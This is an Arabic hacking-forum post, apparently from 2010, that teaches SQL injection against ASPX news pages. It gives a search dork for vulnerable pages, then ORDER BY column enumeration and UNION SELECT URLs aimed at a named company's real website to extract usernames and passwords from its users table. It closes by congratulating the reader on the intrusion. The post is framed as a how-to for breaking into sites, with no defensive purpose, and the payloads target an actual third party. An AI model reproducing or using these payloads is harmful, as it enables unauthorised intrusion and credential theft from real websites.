المدير
Admin
عدد المساهمات : 419
نقاط : 1236
السٌّمعَة : 0
تاريخ التسجيل : 16/10/2010
العمر : 34
الموقع : المخاء
![اختراق المواقع بثغره SQL injection [الفصل الثاني] Empty](https://2img.net/i/empty.gif) | | موضوع: اختراق المواقع بثغره SQL injection [الفصل الثاني] الأحد ديسمبر 12, 2010 5:59 pm | |
| بســم الله الـرحمـ ـن الـرحـيـم ألسلآم عليكـ ـم أعـضـآء قــوـآت الهـكــر العــربـيـ ـه أعذـرونـي على الإنقـطـاع والتقصيــر إلــي حصــل في الفـتـره الآخـيــره صدقونـي لدـوآعي المرض [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]عــلـى العمـوم مو موضـوعـنــآء اليــوم تــآبـع للدرس الســآبق ثغـرات SQL [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط] بس اليـوم رح يكـون التطبيـــق سهل سهل سهل جدـا وصدقونـي مـارح تلاقـوا اسهـل مـن هـا الشــرح فـي ـآي منتـ ـدـى ـآخـ ـر [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]طبعـا مـارح اشرح اليوم تحـت بيـه الــphp لأ رح يكـون الشـرح اليوم أن شـآء الله على ثغرأت ملفـات الـ aspxنبـدـآ على بركه الله بالأول رح دور على الثغـره هذه في العـم جـوجـ ـل كود PHP: show_news_details.aspx?id="
هذه هي اسهـل ثغـره على تطبق عليهـا المهـم خلونـا نشــرح الثغـره show_news_details.aspx الملـف المصــآب
id المتغيـر
طيـب أنـا رح أطبــ ـق الثغـ ـ ـره على مـوقـع شركه السلطـآن وخلـف للتجـآره [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
المهـم بعـد مـا تخـتـآر موقـع مصــآب بثغـره ضيف علامـه أستعلآم للتـآكد من وجود الثغـ ـره
إمـا ان تضيف هذه /* أو '
طيب لاحـظ ضهـور الخطــآء
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذه الصورة]
طيــب جميــل جـدـا
الحيـن تـآكدنـا من وجود ثغـره
طيب حلو جميـل الان نضيف امر استعلام الجـآدول المصابه
كود PHP: order+by
يعنـي رح يصير الرابط هيك
كود PHP:
http://www.sultan-khalaf.com/show_news_details.aspx?id=1+order+by+1
طبعا مع تغيـر رقم 1 إلى ان تصل إلى العمـود المصاب
طيب الآن نسوي أمـر التحقــق من الأعمـده المصـآبه بدقه ولا تنسـو نضيف قبل المتغيـر إشـاره السـآلب -
كود PHP:
+union+select+
يعنـي رح يصير الرابط هيـكـ
كود PHP:
http://www.sultan-khalaf.com/show_news_details.aspx?id=-1+union+select+1,2,3,4,5,6,7,8,9+from+users
ملاحظـه طبعــآ في هذه الثغره لا زم تضيف بعد الاعمـده +from+users
هذا يعني انه رح يتحقق من جدول الـ users
يعني كل ما تغيرت الثغره كل ما تغير حـاجـات كتيـره
شوف الصوره
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذه الصورة]
خلآص وصنـا للنهـآيه
طلـع معـايا 2 و 5 الاعمـده المصابه
طيب خلآص الحيـن تغير العمود رقم 2 بكلمه username
والعمــود رقم 5 بكلمه password
طيب شوف كيف رح يصير الرـآبـط
كود PHP:
http://www.sultan-khalaf.com/show_news_details.aspx?id=-1+union+select+1,username,3,4,password,6,7,8,9+from+users
وشوف الصـوره
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط][/url] [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط][/url] [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
مبــروكـ عليـكـ الإختــرآق [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط] | |
|
![اختراق المواقع بثغره SQL injection [الفصل الثاني] Polish11](https://i.servimg.com/u/f72/15/75/87/58/polish11.jpg)
المنشورات 
